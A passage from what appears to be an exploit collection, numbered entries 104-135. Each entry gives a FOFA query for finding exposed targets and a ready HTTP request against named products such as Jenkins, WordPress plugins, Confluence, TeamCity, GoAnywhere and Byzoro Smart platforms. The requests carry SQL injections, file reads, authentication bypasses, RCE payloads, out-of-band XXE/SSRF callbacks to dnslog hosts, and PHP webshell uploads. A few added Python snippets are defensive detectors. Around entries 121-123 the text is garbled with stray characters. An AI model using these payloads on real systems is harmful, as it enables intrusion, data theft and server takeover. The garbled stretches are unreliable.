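_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
# SYSTEM "url"  or  PUBLIC "pubid" "url", optionally a parameter entity (% name)
_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)")',
    re.I)


def decode_saml_request(form_body):
    """Return the XML carried in SAMLRequest (HTTP-POST binding: percent-decode, then base64).
    The PoC sends the value raw, so '+' is not treated as a space here."""
    for pair in form_body.split("&"):
        key, _, value = pair.partition("=")
        if key == "SAMLRequest":
            return base64.b64decode(unquote(value)).decode("utf-8", "replace")
    return None


def has_doctype(xml_text):
    return _DOCTYPE_RE.search(xml_text) is not None


def external_entity_urls(xml_text):
    """URLs of SYSTEM/PUBLIC entities: each is an out-of-band fetch the parser will attempt."""
    return [a or b for a, b in _ENTITY_RE.findall(xml_text)]


def safe_parse(xml_text):
    """Hardened parse: refuse any document with a DTD before it reaches the XML parser.
    A SAML AuthnRequest never legitimately needs one."""
    if has_doctype(xml_text) or re.search(r"<!ENTITY", xml_text, re.I):
        raise ValueError("DTD / entity declarations are not accepted in SAML messages")
    return ET.fromstring(xml_text)


def triage(form_body):
    """One-call check for a captured body: decoded XML plus XXE indicators."""
    xml_text = decode_saml_request(form_body)
    if xml_text is None:
        return None
    return {
        "doctype": has_doctype(xml_text),
        "external_refs": external_entity_urls(xml_text),
        "xml": xml_text,
    }
```

Run over proxy or WAF captures, triage() turns an opaque base64 blob into something a rule can match on; the string match on <!DOCTYPE is deliberately applied before parsing, because by the time a DTD-aware parser reports anything the external fetch may already have happened.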
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}


105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
(the URL is truncated in the source; the injection point is the trailing updatexml expression)


106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The Blade-Auth value above is the token from the original demo instance; a real target needs a Blade-Auth token that is valid for it.

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

The body is sent as raw bytes (the b'...' above is Python notation). Open the download side of the same Session to read the response:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The argument @/etc/passwd is expanded to the file's contents: the first line of /etc/passwd comes back as the "default" value in the usage text and the second line in the "Too many arguments" error:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


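Added example (not from the original post or from the Jenkins project): a Python encoder and decoder for the byte string in PoC 109. The framing (4-byte big-endian payload length that does not count the opcode, then a 1-byte opcode, then the payload; string payloads in Java writeUTF layout with a 2-byte length) and the opcode values ARG=0, LOCALE=1, ENCODING=2, START=3 are read off the PoC bytes themselves, which the encoder reproduces exactly. The decoder is what a reverse proxy in front of /cli can use to refuse any ARG that starts with @, the args4j feature the file read abuses. The function names are hypothetical.

```python
import struct

# Opcode ordinals as they appear in the PoC bytes above.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3

# The upload body from PoC 109, as a byte string.
PAGE_BYTES = (b"\x00\x00\x00\x06\x00\x00\x04help"
              b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
              b"\x00\x00\x00\x05\x02\x00\x03GBK"
              b"\x00\x00\x00\x07\x01\x00\x05en_US"
              b"\x00\x00\x00\x00\x03")


def java_utf(text):
    """Java DataOutputStream.writeUTF layout: 2-byte big-endian length, then the bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op, payload=b""):
    """One frame: 4-byte big-endian payload length (opcode not counted), opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_cli_upload(args, encoding="GBK", locale="en_US"):
    """Rebuild the upload-side body: one ARG frame per argument, then ENCODING,
    LOCALE, and the empty START frame that makes the server parse the command line."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    body += frame(OP_START)
    return body


def parse_cli_upload(body):
    """Split a raw upload body back into (opcode, payload) frames; reject truncation."""
    frames, i = [], 0
    while i + 5 <= len(body):
        (length,) = struct.unpack(">I", body[i:i + 4])
        op = body[i + 4]
        payload = body[i + 5:i + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame")
        frames.append((op, payload))
        i += 5 + length
    if i != len(body):
        raise ValueError("trailing bytes after last frame")
    return frames


def file_expansion_args(body):
    """Paths that the @file expansion would read on the controller: any ARG whose text
    starts with '@'. A non-empty result is the signature of the PoC above."""
    paths = []
    for op, payload in parse_cli_upload(body):
        if op != OP_ARG:
            continue
        (n,) = struct.unpack(">H", payload[:2])
        text = payload[2:2 + n].decode("utf-8")
        if text.startswith("@"):
            paths.append(text[1:])
    return paths


if __name__ == "__main__":
    assert build_cli_upload(["help", "@/etc/passwd"]) == PAGE_BYTES
    print(file_expansion_args(PAGE_BYTES))  # ['/etc/passwd']
```

Jenkins 2.442 and LTS 2.426.3 disable the @file expansion in the CLI parser; until a controller is upgraded, blocking /cli at the proxy (or rejecting bodies for which file_expansion_args is non-empty) removes the read primitive without touching the web UI.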
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

A 200 response carrying the initial account setup wizard confirms the traversal; the administrator account is then created through that form.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce (it is exposed in the homepage's inline bricksData JavaScript object)
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

The command output is returned inside the exception message, which is why the PHP snippet buffers the output of `id` and throws it.

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

The source leaves the body of the support_custom_img part empty; {{rand8}} is a nuclei template placeholder for a random filename.

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Byzoro (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field names the destination, so the webshell lands at /home/src.php; request that path and pass the command in the passwd POST parameter.

119. Byzoro (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

The injection is time-based: a response delayed by about five seconds means the database name is three characters long; vary the comparison to enumerate further.

120. Byzoro (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The uploaded file is written to /upload/2.php.

121. Byzoro (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328
6 m7 H8 o" z5 m1 y1 U

& x1 k! t4 R0 _; g' b2 b$ i) G  F4 p; nboot/web/upload/weblogo/1.php
* p+ S% Y' M6 P) d
122. Beijing Baichao Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

. c" ?5 b  f2 h; C" f% n; [123. Atlassian Confluence 模板注入代码执行
# t5 k# L3 V  w: EFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
; Y1 N; j4 u; f1 B6 r" L: lPOST /template/aui/text-inline.vm HTTP/1.1
% e7 v  b. w: ^4 rHost: localhost:8090
1 Q+ L- `" g' ~0 AAccept-Encoding: gzip, deflate, br
9 q5 G2 y$ P! p( h4 B: rAccept: */*( [0 g, @% _' \  F8 \  A
Accept-Language: en-US;q=0.9,en;q=0.8
6 r" n5 H. _6 N( mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36# w1 f. \, a' {* T8 V
Connection: close
2 e2 o, a3 v$ ~0 H' m; z5 MContent-Type: application/x-www-form-urlencoded- ?8 t( r8 E' u& e* f5 m

& E3 N$ H( A/ b3 v6 E8 Blabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))6 N) J; {' f7 g

* m. W7 q5 {5 [
124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Resulting file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
